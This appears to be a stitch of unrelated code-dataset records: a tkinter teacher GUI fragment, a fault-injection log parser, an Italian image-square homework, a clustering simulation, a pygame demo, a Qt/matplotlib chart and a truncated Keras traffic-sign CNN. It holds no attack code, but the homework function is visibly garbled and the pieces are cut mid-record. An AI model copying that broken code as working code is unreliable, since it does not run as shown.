No:\",bg=\"pink\",fg=\"black\",font=(\"Constantia\",18,\"bold\"))\r\n    studA_label.place(x=240,y=350)\r\n    adm_entry=Entry(windowT,width=15, font=(12))\r\n    adm_entry.place(x=500,y=350)\r\n\r\n    def submit():\r\n        adm_no = adm_entry.get()\r\n        checkreport(adm_no)\r\n\r\n    #button to check their report using matplotlib.\r\n    sub_find=Button(windowT,text=\"SUBMIT\",fg='white',bg='black',relief=RIDGE,font=(\"Constantia\",13),width=10,command=submit)\r\n    sub_find.place(x=420,y=400)\r\n\r\n    #add marks label\r\n    add_label=Label(windowT,text=\"Add marks:\",bg=\"pink\",fg=\"red\",font=(\"Constantia\",20,\"bold\"))\r\n    add_label.place(x=210,y=470)\r\n\r\n    #exam type buttons (functions are there in the entermarks.py file)\r\n    button_Q=Button(windowT,text=\"Quarterly\",fg='blue',bg='light yellow',relief=RIDGE,font=(\"Constantia\",14),width=10,command=Quarterly)\r\n    button_Q.place(x=250,y=540)\r\n\r\n    button_H=Button(windowT,text=\"Half yrly\",fg='blue',bg='light yellow',relief=RIDGE,font=(\"Constantia\",14),width=10,command=Halfyrly)\r\n    button_H.place(x=500,y=540)\r\n\r\n    button_A=Button(windowT,text=\"Annual\",fg='blue',bg='light yellow',relief=RIDGE,font=(\"Constantia\",14),width=10,command=annual)\r\n    button_A.place(x=750,y=540)\r\n\r\n","sub_path":"teacher.py","file_name":"teacher.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"215108156","text":"#!/bin/python\nimport re, os, getopt, sys, pickle\n\nclass Injection:\n    \"\"\"\n    Stores information about a single fault injection\n    \"\"\"\n    def __init__(self, varName, varType, line, memContentBefore, newValue, faultModel, fileName, functionName, faultResult, sdcCriticality, time, decLine, decFile):\n        self.varName = varName\n        self.varType = varType\n        self.line = line\n        self.memContentBefore = memContentBefore\n        self.newValue = newValue\n        self.faultModel = faultModel\n        self.fileName = fileName\n        self.functionName = functionName\n        self.faultResult = faultResult\n        self.sdcCriticality = sdcCriticality # -1 = not evaluated, 0 = not critical, >0 = how critical\n        self.time = time\n        self.decLine = decLine\n        self.decFile = decFile\n\n    def __eq__(self, other):\n        \"\"\"\n        Return true if the variables are the same\n        \"\"\"\n        return self.varName == other.varName and self.decLine == other.decLine \\\n            and self.decFile == other.decFile\n\n    def __repr__(self):\n\n        if self.varType.find(\"structure\") > -1 or self.varType.find(\"array\") > -1:\n            # Doesn't print values for arrays or structs\n            return \"faultResult: %s\\nvarName: %s\\nvarType: %s\\nline: %s\\nfaultModel: %s\\nfileName: %s\\nfunctionName: %s\\n\" %(self.faultResult, self.varName, self.varType, self.line, self.faultModel, self.fileName, self.functionName)\n        else:\n            return \"faultResult: %s\\nvarName: %s\\nvarType: %s\\nline: %s\\nmemCont: %s\\nnewValue: %s\\nfaultModel: %s\\nfileName: %s\\nfunctionName: %s\\n\" %(self.faultResult, self.varName, self.varType, self.line, self.memContentBefore, self.newValue, self.faultModel, self.fileName, self.functionName)\n\nclass Result:\n    \"\"\"\n    Stores information about all results from multiple fault injections\n    \"\"\"\n    def __init__(self, failedList, hangList, maskedList, sdcList):\n        self.failedList = failedList\n        self.hangList = hangList\n        self.maskedList = maskedList\n        self.sdcList = sdcList\n\n    def __repr__(self):\n\n        return \"--Result--\\n\\tFailed: %d\\n\\tHangs: %d\\n\\tMasked: %d\\n\\tSDCs: %d\\n\" %(len(self.failedList), len(self.hangList), len(self.maskedList), 
len(self.sdcList))\n\n#-------------------------------------------------------------------------------\ndef main(argv):\n\n    logDir = \"/home/andre/ufrgs/ftf/initial_logs/collisionDetection-random/\"\n    newLogs = False\n\n    # Reading arguments from command line\n    try:\n        opts, args = getopt.getopt(argv, \"\", [\"help\", \"new\"])\n        for opt, arg in opts:\n            if opt == \"--new\":\n                newLogs = True\n            elif opt == \"--help\":\n                print(\"Usage:\")\n                print(\"\\t--new to read all log files from the directory listed in \\'logDir\\' variable.\")\n                print(\"\\tNo argument to read values from previously written \\'result.pkl\\' file.\")\n                sys.exit(1);\n    except getopt.GetoptError:\n        print(\"Problem with provided arguments\")\n        sys.exit(0)\n\n    if(newLogs):\n        # Initialization\n        failedList = list()\n        hangList = list()\n        maskedList = list()\n        noOutputList = list()\n        sdcList = list()\n\n        # Searches all directories\n        for fileName in os.listdir(logDir):\n            # Skip regular files\n            if not os.path.isdir(logDir + fileName):\n                continue\n\n            if fileName == \"failed-injection\":\n                # Failed\n                print(\"Reading failed injection logs...\")\n                failedList = handleLogDir(failedList, logDir+\"failed-injection/\", \"failed\")\n\n            elif fileName == \"hangs\":\n                # Hangs\n                print(\"Reading hang injections logs...\")\n                hangList = handleLogDir(hangList, logDir+\"hangs/\", \"hang\")\n\n            elif fileName == \"masked\":\n                # Masked\n                print(\"Reading masked injections logs...\")\n                maskedList = handleLogDir(maskedList, logDir+\"masked/\", \"masked\")\n\n            elif fileName == \"noOutputGenerated\":\n                # No output\n                print(\"Reading noOutput injections logs...\")\n                noOutputList = handleLogDir(noOutputList, logDir+\"noOutputGenerated/\", \"noOutputGenerated\")\n\n            elif fileName == \"sdcs\":\n                # SDCs\n                print(\"Reading SDC injections logs...\")\n                sdcList = handleLogDir(sdcList, logDir+\"sdcs/\", \"sdc\")\n\n        # Create Result object\n        result = Result(failedList, hangList, maskedList, sdcList)\n        # Save variables with pickle\n        pickle.dump(result, open(\"result.pkl\", \"wb\"))\n\n    else:\n        # Reads variables with pickle\n        try:\n            result = pickle.load(open(\"result.pkl\", \"rb\"))\n        except:\n            print(\"Couldn't read pickle values!\")\n            sys.exit(0)\n\n    # Print number of elements in each list\n    print(result)\n    # listSdcCriticality(result)\n    listCriticalVariables(result)\n    # listTimeVulnerability(result)\n\n#-------------------------------------------------------------------------------\ndef listSdcCriticality(result):\n    \"\"\"\n    List SDC criticality\n    \"\"\"\n    sdcCriticalityFilePath = \"/home/andre/ufrgs/ftf/sdcCriticality.log\"\n    listBuf = result.sdcList\n    listBuf = sorted(listBuf, key=lambda x: x.sdcCriticality)\n    listBuf.reverse()\n\n    # Log file\n    logFile = open(sdcCriticalityFilePath, \"w\")\n\n    totalElements = 2819.0\n\n    for percentageCount in range(2,101,2):\n        elementCount = 0\n        for item in listBuf:\n            if (item.sdcCriticality > percentageCount-2) and (item.sdcCriticality <= percentageCount):\n                elementCount += 1\n\n\n        logFile.write(\"%d: %.2f\\n\" %(percentageCount, float(elementCount)/totalElements*100.0))\n    logFile.close()\n\ndef listCriticalVariables(result):\n    \"\"\"\n    Lists the number of occurrences of each variable in each Result list\n    Outputs results into listCriticalVariables.dat file\n    \"\"\"\n\n    sdcCritVarFilePath = \"/home/andre/ufrgs/ftf/sdcCriticalVariables.log\"\n    hangCritVarFilePath = \"/home/andre/ufrgs/ftf/hangCriticalVariables.log\"\n    sdcVarDic = dict()\n    hangsVarDic = dict()\n\n    # Creates dicts for variable occurrences\n    for varIndex, inj in 
enumerate(result.hangList):\n        # For each injection\n        varFound = False\n        for index in hangsVarDic.keys():\n            # Each index already stored in the counter list\n            if(result.hangList[index] == inj):\n                # The variables are the same\n                hangsVarDic[index] += 1\n                varFound = True\n\n        if not varFound:\n            # Variable hasn't been counted yet\n            hangsVarDic[varIndex] = 1\n\n    hangsVarDic = sorted(hangsVarDic.items(), key=lambda x: x[1])\n\n    for varIndex, inj in enumerate(result.sdcList):\n        # For each injection\n        varFound = False\n        for index in sdcVarDic.keys():\n            # Each index already stored in the counter list\n            if(result.sdcList[index] == inj):\n                # The variables are the same\n                sdcVarDic[index] += 1\n                varFound = True\n\n        if not varFound:\n            # Variable hasn't been counted yet\n            sdcVarDic[varIndex] = 1\n\n    sdcVarDic = sorted(sdcVarDic.items(), key=lambda x: x[1])\n\n    #Print lists into log file\n    hangLogFile = open(hangCritVarFilePath, \"w\")\n    sdcLogFile = open(sdcCritVarFilePath, \"w\")\n\n    for item in hangsVarDic:\n        hangLogFile.write(\"%s[%s:%d]: %s\\n\" %(result.hangList[item[0]].varName, result.hangList[item[0]].decFile, result.hangList[item[0]].decLine, item[1]))\n\n    for item in sdcVarDic:\n        sdcLogFile.write(\"%s[%s:%d]: %s\\n\" %(result.sdcList[item[0]].varName, result.sdcList[item[0]].decFile, result.sdcList[item[0]].decLine, item[1]))\n\n    sdcLogFile.close()\n    hangLogFile.close()\n\ndef listTimeVulnerability(result):\n    \"\"\"\n    Creates log with number of hangs and SDCs over time\n    \"\"\"\n    hangLogPath = \"/home/andre/ufrgs/ftf/hangTimeVulnerability.log\"\n    sdcLogPath = \"/home/andre/ufrgs/ftf/sdcTimeVulnerability.log\"\n    hangList = result.hangList\n    sdcList = result.sdcList\n    timeStep = 1\n\n    hangList = sorted(hangList, key=lambda x: x.time)\n    sdcList = sorted(sdcList, key=lambda x: x.time)\n    hangFile = open(hangLogPath, \"w\")\n    sdcFile = open(sdcLogPath, \"w\")\n\n    for timeSlot in range(timeStep, 40, timeStep):\n        hangCount = 0\n        sdcCount = 0\n        for item in hangList:\n            if (item.time > timeSlot-timeStep) and (item.time <= timeSlot):\n                hangCount += 1\n\n        for item in sdcList:\n            if (item.time > timeSlot-timeStep) and (item.time <= timeSlot):\n                sdcCount += 1\n\n        hangFile.write(\"%d - %d: %d\\n\" %(timeSlot-timeStep, timeSlot, hangCount))\n        sdcFile.write(\"%d - %d: %d\\n\" %(timeSlot-timeStep, timeSlot, sdcCount))\n\n    hangFile.close()\n    sdcFile.close()\n\n#-------------------------------------------------------------------------------\ndef sdcCriticality(dirPath):\n    \"\"\"\n    Compares the number of data lines between gold and corrupted outputs\n    Return values: -1 = Error, 0 = Not critical, >0 = How critical\n\n    gold file has a total of 222082 lines, 294 of which have no data in them.\n    The total number of useful lines is 221788\n    \"\"\"\n\n    faultyFileLines = 0\n    faultyFileName = \"outputFile\"\n    goldFileLines = 221788\n\n    faultyContent = open(dirPath+\"/\"+faultyFileName, \"r\").readlines()\n    count = 0\n    for line in faultyContent:\n        # Counts the number of useful lines\n        if re.search(\"New Iteration*\", line):\n            count += 1\n\n    faultyFileLines = len(faultyContent) - count\n    absDifference = abs(goldFileLines - faultyFileLines)\n    # Percentage difference\n    perDifference = (float(absDifference)/float(goldFileLines)) * 100.0\n    return(perDifference)\n\ndef handleLogDir(injList, hangDir, faultResult):\n\n    sdcCount = 0\n\n    for dateDir in os.listdir(hangDir):\n        # Every date directory\n        if not os.path.isdir(hangDir+dateDir):\n            # Skip regular files\n            continue\n        for logDir in os.listdir(hangDir+dateDir):\n            # Every injection 
directory\n            # Finds the useful log file\n            logFileList = os.listdir(hangDir + dateDir + \"/\" + logDir)\n            fileIndex = findInList(logFileList, \"flipvalue\")\n            if fileIndex != -1:\n                # Reads data from file and appends new object to the result list\n                logFile = open(hangDir + dateDir + \"/\" + logDir + \"/\" + logFileList[fileIndex], \"r\").readlines()\n                injBuffer = readValuesFromLog(logFile, faultResult)\n                # Performs application specific SDC criticality analysis\n                if faultResult == \"sdc\":\n                    sdcCount += 1\n                    print(\"Evaluating SDC number %d criticality...\" %(sdcCount))\n                    # TODO: UNCOMMENT\n                    # injBuffer.sdcCriticality = sdcCriticality(hangDir + dateDir + \"/\" + logDir)\n\n                injList.append(injBuffer)\n\n    return injList\n\ndef readValuesFromLog(fileContent, faultResult):\n    \"\"\"\n    Returns an Injection object containing the values read from the file\n    \"\"\"\n    # Initializes variables\n    varName = \"\"\n    varType = \"\"\n    injectionLine = \"\"\n    memContentBefore = \"\"\n    newValue = \"\"\n    faultModel = \"\"\n    filename = \"\"\n    funcName = \"\"\n    time = \"\"\n    # Reads every line in the file\n    for line in fileContent:\n        # Extracts data from each line\n        if re.search(\"^Fault Model:.*\", line):\n            # Fault Model: Random bit-flip\n            faultModel = re.search(\"(?<=^Fault Model:).*\", line).group().lstrip()\n\n        elif re.search(\"^#0.+:\\d+\", line):\n            # Injection line and file name\n            # #0  0x0000000000400ff0 in updatePositions (elapsedTime_uSec=100000) at collisionDetection.c:106\n            filename = re.search(\"(?<=\\) at )[a-zA-Z0-9_\\.]+\", line).group().lstrip()\n            injectionLine = re.search(\"(?<=:)[0-9]+\", line).group().lstrip()\n\n        elif re.search(\"^Memory content before bitflip:.*\", line):\n            # Memory content before bitflip:0x9a0x990x990x990x990x990xb90x3f\n            memContentBefore = re.search(\"(?<=Memory content before bitflip:)[0-9xa-fA-F]+\", line).group().lstrip()\n\n        elif re.search(\"^frame name:.*\", line):\n            # Function name\n            # frame name: updatePositions\n            funcName = re.search(\"(?<=^frame name:).*\", line).group().lstrip()\n\n        elif re.search(\"^symbol name:.*\", line):\n            # symbol name: elapsedTime_Sec\n            varName = re.search(\"(?<=^symbol name:).*\", line).group().lstrip()\n\n        elif re.search(\"^value:.*\", line):\n            # Value after bitflip\n            # value: 1.3269862909504584e+89\n            newValue = re.search(\"(?<=^value:).*\", line).group().lstrip()\n\n        elif re.search(\"^Type:.*\", line):\n            # Variable type\n            # Type: A floating point type.\n            varType = re.search(\"(?<=^Type:).*\", line).group().lstrip()\n\n        elif re.search(\"^Fault.*\", line):\n            # Injection time\n            # Fault Injection Successful after 2.5929765701293945s\n            time = re.search(\"(?<=^Fault Injection Successful after).*(?=s)\", line).group().lstrip()\n            time = float(time)\n\n        elif re.search(\"^symbol line.*\", line):\n            # Variable declaration line\n            # symbol line: 9\n            decLine = re.search(\"(?<=^symbol line:).*\", line).group().lstrip()\n            decLine = int(decLine)\n\n        elif re.search(\"^symbol filename.*\", line):\n            # Variable declaration file\n            # symbol filename: collisionDetection.c\n            decFile = re.search(\"(?<=^symbol filename:).*\", line).group().lstrip()\n\n    injectionBuf = Injection(varName, varType, injectionLine, memContentBefore, newValue, faultModel, filename, funcName, faultResult, -1, time, decLine, decFile)\n    return injectionBuf\n\ndef findInList(listVar, content):\n    \"\"\"\n    Returns index to searched element, or -1 if not found\n    \"\"\"\n\n    for index, element in enumerate(listVar):\n        if isinstance(element, str):\n            if element.find(content) != -1:\n                return index\n\n    return 
-1\n\ndef printList(listVar):\n \"\"\"\n Prints all the elements in a list\n \"\"\"\n\n for element in listVar:\n print(element)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"original/readLogs.py","file_name":"readLogs.py","file_ext":"py","file_size_in_byte":14497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47542276","text":"'''\r\nAbbiamo immagini in formato png ottenute inserendo su di uno sfondo monocolore rettangoli \r\ndi vari colori i cui assi sono sempre parallei agli assi dell'immagine.\r\n\r\nVedi ad esempio l'immagine Img1.png\r\n\r\nPer caricare e salvare immagini PNG usate le funzioni load e save che abbiamo preparato nel modulo immagini.py .\r\n\r\nScrivere una funzione quadrato(filename, C) che prende in input:\r\n- il percorso di un file (filename) che contine un immagine in formato png della tipologia appena descritta.\r\n- una tupla C che rappresenta un colore in formato RGB (3 valori interi tra 0 e 255 compresi)\r\n\r\nLa funzione deve restituire nell'ordine:\r\n- la lunghezza del lato del quadrato pieno di dimensione massima e colore C interamente visibile nell'immagine. \r\n- le coordinate (x,y) del pixel dell'immagine che corrisponde alla posizione \r\nall'interno dell'immagine del punto in alto a sinistra del quadrato. \r\n\r\nIn caso ci siano più quadrati di dimensione massima, va considerato quello il cui punto \r\nin alto a sinistra occupa la riga minima (e a parita' di riga la colonna minima) all'interno dell' immagine. \r\n\r\nSi può assumere che nell'immagine e' sempre presente almeno un pixel del colore cercato.\r\n\r\nPer gli esempi vedere il file grade01.txt\r\n\r\nATTENZIONE: Il timeout è impostato a 10*N secondi (con N numero di test del grader).\r\n'''\r\n\r\nfrom immagini import png\r\n\r\ndef quadrato(filename,c):\r\n imglist=load(filename)\r\n return scorri(imglist,c)\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\ndef scorri(imglist,c):\r\n k=0\r\n y=0\r\n x=0\r\n coord=[0,0]\r\n lun=0\r\n luny=len(imglist)\r\n lunx=len(imglist[y])\r\n h=[0,[0,0],0]\r\n while ylun and pieno(y,x,y1,x1,imglist,c)==True :\r\n return lun1,[y,x],x1\r\n else:\r\n return lun,coord,x\r\n \r\n \r\n \r\n\r\n\r\n\r\ndef pieno(y,x,y1,x1,imglist,c): #devo mettere che trovando un elemento non c termina immediatamente\r\n a=y\r\n b=x\r\n while a<=y1:\r\n b=x\r\n while b<=x1:\r\n if imglist[a][b]!=c:\r\n return False\r\n \r\n\r\n b+=1\r\n \r\n a+=1\r\n return True\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef load(fname):\r\n with open(fname, mode='rb') as f:\r\n reader = png.Reader(file=f)\r\n w, h, png_img, _ = reader.asRGB8()\r\n img = []\r\n for line in png_img:\r\n l = []\r\n for i in range(0, len(line), 3):\r\n l+=[(line[i], line[i+1], line[i+2])]\r\n img+=[l]\r\n return img\r\n","sub_path":"students/1818290/homework03/program01.py","file_name":"program01.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"278409349","text":"###Simulation\r\n##Cluster overlap in 2D\r\n\r\n#Import librarties\r\nfrom sklearn.datasets.samples_generator import make_blobs\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.mixture import GaussianMixture\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport random\r\nfrom sklearn import metrics\r\nfrom random import randint\r\n\r\n\r\n#Define purity function (ie. 
how many points were correctly \"clustered\")\r\ndef purity(y_true, y_pred):\r\n # compute contingency matrix (also called confusion matrix)\r\n contingency_matrix = metrics.cluster.contingency_matrix(y_true, y_pred)\r\n # return purity\r\n return np.sum(np.amax(contingency_matrix, axis=0)) / np.sum(contingency_matrix) \r\n\r\n\r\n \r\n#Matrices for the purity scores\r\nFrameK = np.empty((0,90))\r\nFrameM1 = np.empty((0,90))\r\nFrameM2 = np.empty((0,90))\r\nFrameM3 = np.empty((0,90))\r\nFrameM4 = np.empty((0,90))\r\n\r\n#Set seed to replicate results\r\nrandom.seed(1)\r\n\r\n#Create a loop to get the average performance of the method\r\nfor j in range(0,10):\r\n print(\"Progress: \", j)\r\n #Vectors/lists for the purity score of one round\r\n purityK=[]\r\n purityM1=[]\r\n purityM2=[]\r\n purityM3=[]\r\n purityM4=[]\r\n\r\n obs=[]\r\n i=1\r\n\r\n #Random state for creating the Gaussian set\r\n omegarand=random.uniform(0.01,0.05)\r\n rand=randint(0, 10)\r\n #Random state for \"stretching\" the data set\r\n rng = np.random.RandomState(74)\r\n \r\n while(i<=9):\r\n print(\"Progress: \", j, i)\r\n\r\n \r\n obs.append(i)\r\n \r\n \r\n X, y = make_blobs(n_samples=10000, centers=4, n_features=2,\r\n random_state=rand,cluster_std=i,shuffle=True)\r\n \r\n \r\n \r\n # transform the data to be stretched\r\n #transformation = rng.normal(size=(i, i))\r\n \r\n #if rand%2==0:\r\n # X = np.dot(X, transformation)\r\n\r\n \r\n #K-means\r\n\r\n kmeans = KMeans(4, random_state=0,max_iter=10000,init='random')\r\n klabels = kmeans.fit(X).predict(X)\r\n \r\n # Mixtures\r\n \r\n #gmm1=mclust.Mclust(X,verbose=\"FALSE\",modelNames=\"VVI\")\r\n #gmm2=mclust.Mclust(X,verbose=\"FALSE\",modelNames=\"EEI\")\r\n #gmm3=mclust.Mclust(X,verbose=\"FALSE\",modelNames=\"EVI\")\r\n \r\n gmm1 = GaussianMixture(4,random_state=0,max_iter=10000,\r\n init_params='kmeans',covariance_type='full')\r\n \r\n gmm2 = GaussianMixture(4,random_state=0,max_iter=10000,\r\n init_params='kmeans',covariance_type='diag')\r\n \r\n gmm3 = GaussianMixture(4,random_state=0,max_iter=10000,\r\n init_params='kmeans',covariance_type='tied')\r\n \r\n gmm4 = GaussianMixture(4,random_state=0,max_iter=10000,\r\n init_params='kmeans',covariance_type='spherical')\r\n \r\n m1labels = gmm1.fit(X).predict(X)\r\n m2labels = gmm2.fit(X).predict(X)\r\n m3labels = gmm3.fit(X).predict(X)\r\n m4labels = gmm4.fit(X).predict(X)\r\n \r\n \r\n purityK.append(purity(y, klabels))\r\n purityM1.append(purity(y, m1labels))\r\n purityM2.append(purity(y, m2labels))\r\n purityM3.append(purity(y, m3labels))\r\n purityM4.append(purity(y, m4labels))\r\n \r\n\r\n i=i+0.1\r\n\r\n \r\n FrameK=np.append(FrameK,[purityK],axis=0)\r\n FrameM1=np.append(FrameM1,[purityM1],axis=0) \r\n FrameM2=np.append(FrameM2,[purityM2],axis=0) \r\n FrameM3=np.append(FrameM3,[purityM3],axis=0) \r\n FrameM4=np.append(FrameM4,[purityM4],axis=0) \r\n\r\n\r\n\r\n###Draw the damn pictures\r\nmeanK=np.mean(FrameK,axis=0)\r\nmeanM1=np.mean(FrameM1,axis=0)\r\nmeanM2=np.mean(FrameM2,axis=0)\r\nmeanM3=np.mean(FrameM3,axis=0)\r\nmeanM4=np.mean(FrameM4,axis=0)\r\n \r\n\r\nplt.plot(obs,meanK,'b',\r\n obs,meanM1,'r',\r\n obs,meanM2,'m',\r\n obs,meanM3,'c',\r\n obs,meanM4,'g' )\r\n\r\nplt.ylim(0.2,1.05)\r\n\r\nplt.legend(['K-means','Full','Diag','Tied','Spherical'])\r\n\r\nplt.xlabel('Cluster sd')\r\nplt.ylabel('Purity score')\r\nplt.title('Increasing 
overlap')\r\n\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"SimulationOverlap.py","file_name":"SimulationOverlap.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"610790794","text":"import pygame as py\r\nimport random as rand\r\nimport time\r\n\r\nimport entity as ent\r\nimport component as comp\r\nimport systems\r\n\r\nWIDTH = 640\r\nHEIGHT = 480\r\n\r\n#SETUP WINDOW, CLOCK, AND ECS MANAGER\r\npy.init()\r\nwindow = py.display.set_mode((WIDTH, HEIGHT))\r\nclock = py.time.Clock()\r\nmanager = systems.Manager(window, clock)\r\n\r\nrand.seed(int(round(time.time() * 1000)))\r\n\r\n#LIST OF ACTIVE ENTITIES\r\nentities = []\r\n\r\n#PLAYER ENTITY\r\nx = 100\r\ny = 100\r\nplayer = ent.Entity()\r\nplayer.addComponents([comp.position(x, y),\r\n                      comp.sheet(\"assets/sprites/Player/Individual/STILLF.png\", 1, 5),\r\n                      comp.input(), comp.speed(2), comp.velocity(), comp.aabb(x, y, 32, 32), comp.accel()])\r\n#ADD PLAYER TO LIST\r\nentities.append(player)\r\n\r\n#ADD ZOMBIES\r\nfor z in range(100):\r\n    rw = rand.randint(0, WIDTH)\r\n    rh = rand.randint(0, HEIGHT)\r\n\r\n    #Create zombie object\r\n    zombie = ent.Entity()\r\n    zombie.addComponents([comp.position(rw, rh),\r\n                      comp.sprite(\"assets/shadow_wraith.png\"),\r\n                      comp.input(), comp.speed(3), comp.velocity(), comp.aabb(rw, rh, 32, 32), comp.accel()])\r\n    #Add zombie to list\r\n    entities.append(zombie)\r\n\r\n#FPS COUNTER\r\nfps_font = py.font.Font(py.font.get_default_font(), 20)\r\ncurrent_frame, last_frame = 0, 0\r\n\r\n#MAIN LOOP\r\nrun = True\r\nwhile run:\r\n    if py.key.get_pressed()[py.K_UP]:\r\n        manager.chosenOne += 1\r\n    elif py.key.get_pressed()[py.K_DOWN]:\r\n        manager.chosenOne -= 1\r\n    if manager.chosenOne < 0:\r\n        manager.chosenOne = 0\r\n    #CALL THE SYSTEMS \r\n    manager.input(entities)\r\n    manager.movement(entities)\r\n    manager.aabb(entities)\r\n    manager.draw(entities)\r\n\r\n    #FPS CALCULATION\r\n    last_frame = current_frame\r\n    current_frame = py.time.get_ticks()\r\n    fps = 1000 // (current_frame - last_frame)\r\n    fps_surf = fps_font.render(str(fps), False, (255, 255, 255), (0,0,0,0))\r\n    window.blit(fps_surf, (10,10))\r\n\r\n    #UPDATE WINDOW\r\n    py.display.flip()\r\n    window.fill((50,50,50))\r\n    clock.tick(65)\r\n\r\n    #CHECK FOR EXIT\r\n    for event in py.event.get():\r\n        if event.type == py.QUIT:\r\n            run = False\r\n\r\nquit()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192054784","text":"import random\nfrom PyQt5.QtWidgets import QSizePolicy\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass PlotCanvas(FigureCanvas):\n\n    def __init__(self, data, parent=None):\n\n        fig = Figure(figsize=(6.5, 5), dpi=100)\n\n        FigureCanvas.__init__(self, fig)\n        self.setParent(parent)\n\n        FigureCanvas.setSizePolicy(self, QSizePolicy.Expanding, QSizePolicy.Expanding)\n        FigureCanvas.updateGeometry(self)\n\n        self.plot_data(data)\n\n    def plot_data(self, data):\n        \n        # prepare the data\n\n        plan_mean = [plan_value for plan_value in data['plan'].values()]\n        real_mean = [real_expense_value for real_expense_value in data['real'].values()]\n        labels = [expense_name for expense_name in data['real']]\n        ind = 
np.arange(len(real_mean)) \n\n        # create and configure the axes object\n        width = 0.35  # the width of the bars\n\n        ax = self.figure.add_subplot(111)\n        rects1 = ax.barh(ind - width/2, plan_mean, width,\n                color='SkyBlue', label='План')\n        rects2 = ax.barh(ind + width/2, real_mean, width,\n                color='IndianRed', label='Реальность')\n\n        ax.set_position([ 0.25, 0.15, 0.7, 0.70 ])\n        # Add some text for labels, title and custom x-axis tick labels, etc.\n        ax.set_xlabel('Рубли')\n        ax.set_title('Планы и расходы')\n        ax.set_yticks(ind)\n        ax.set_yticklabels(labels, fontdict={'fontsize':8})\n        ax.legend()\n        ax.grid()\n        self.draw()\n\n","sub_path":"for_view/matplot.py","file_name":"matplot.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"585358131","text":"import keras\nimport numpy as np\nfrom skimage import io, color, exposure, transform\nfrom sklearn.cross_validation import train_test_split\nimport os\nimport glob\nimport h5py\nimport pandas as pd\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential, model_from_json\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.pooling import MaxPooling2D\n\nfrom keras.optimizers import SGD\nfrom keras.utils import np_utils\nfrom keras.callbacks import LearningRateScheduler, ModelCheckpoint\nfrom keras import backend as K\nK.set_image_data_format('channels_first')\nfrom keras.callbacks import Callback\nimport os\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\n# %matplotlib inline\n\n\nnp.random.seed(7)\nepochs = 100\nbatch_size = 128\nsave_dir = os.path.join(os.getcwd(), 'saved_models/gtsd-1')\nmodel_name = 'gtsd_model.h5'\n\nNUM_CLASSES = 43\nIMG_SIZE = 48\n\n# Save model and weights\nif not os.path.isdir(save_dir):\n    os.makedirs(save_dir)\n\nclass BatchWeightsSaver(Callback):\n    def __init__(self, model, N):\n        self.model = model\n        self.N = N\n        self.batch = 0\n\n    def on_batch_end(self, batch, logs={}):\n        if self.batch % self.N == 0:\n            name = 'weights-batch%08d.h5' % self.batch\n            self.model.save_weights(save_dir+\"/\"+name)\n        self.batch += 1\n\nclass EpochWeightsSaver(Callback):\n    def __init__(self, model, N):\n        self.model = model\n        self.N = N\n        self.epoch = 0\n\n    def on_epoch_end(self, epoch, logs={}):\n        if self.epoch % self.N == 0:\n            name = 'weights-epoch-%08d.h5' % self.epoch\n            self.model.save_weights(save_dir+\"/\"+name)\n        self.epoch += 1\n\n\ndef preprocess_img(img):\n    # Histogram normalization in y\n    hsv = color.rgb2hsv(img)\n    hsv[:,:,2] = exposure.equalize_hist(hsv[:,:,2])\n    img = color.hsv2rgb(hsv)\n\n    # central crop\n    min_side = min(img.shape[:-1])\n    centre = img.shape[0]//2, img.shape[1]//2\n    img = img[centre[0]-min_side//2:centre[0]+min_side//2,\n              centre[1]-min_side//2:centre[1]+min_side//2,\n              :]\n\n    # rescale to standard size\n    img = transform.resize(img, (IMG_SIZE, IMG_SIZE))\n\n    # roll color axis to axis 0\n    img = np.rollaxis(img,-1)\n\n    return img\n\n\ndef get_class(img_path):\n    return int(img_path.split('/')[-2])\n\ntry:\n    with h5py.File('X.h5') as hf: \n        X, Y = hf['imgs'][:], hf['labels'][:]\n    print(\"Loaded images from X.h5\")\n\nexcept (IOError,OSError, KeyError): \n    print(\"Error in reading X.h5. 
Processing all images...\")\n    root_dir = '/home/aref/datasets/GTSRB/Final_Training/Images/'\n    imgs = []\n    labels = []\n\n    all_img_paths = glob.glob(os.path.join(root_dir, '*/*.ppm'))\n    np.random.shuffle(all_img_paths)\n    for img_path in all_img_paths:\n        try:\n            img = preprocess_img(io.imread(img_path))\n            label = get_class(img_path)\n            imgs.append(img)\n            labels.append(label)\n\n            if len(imgs)%1000 == 0: print(\"Processed {}/{}\".format(len(imgs), len(all_img_paths)))\n        except (IOError, OSError):\n            print('missed', img_path)\n            pass\n\n    X = np.array(imgs, dtype='float32')\n    Y = np.eye(NUM_CLASSES, dtype='uint8')[labels]\n\n    with h5py.File('X.h5','w') as hf:\n        hf.create_dataset('imgs', data=X)\n        hf.create_dataset('labels', data=Y)\n\ndef cnn_model():\n    model = Sequential()\n\n    model.add(Conv2D(32, (3, 3), padding='same',\n                     input_shape=(3, IMG_SIZE, IMG_SIZE),\n                     activation='relu'))\n    model.add(Conv2D(32, (3, 3), activation='relu'))\n    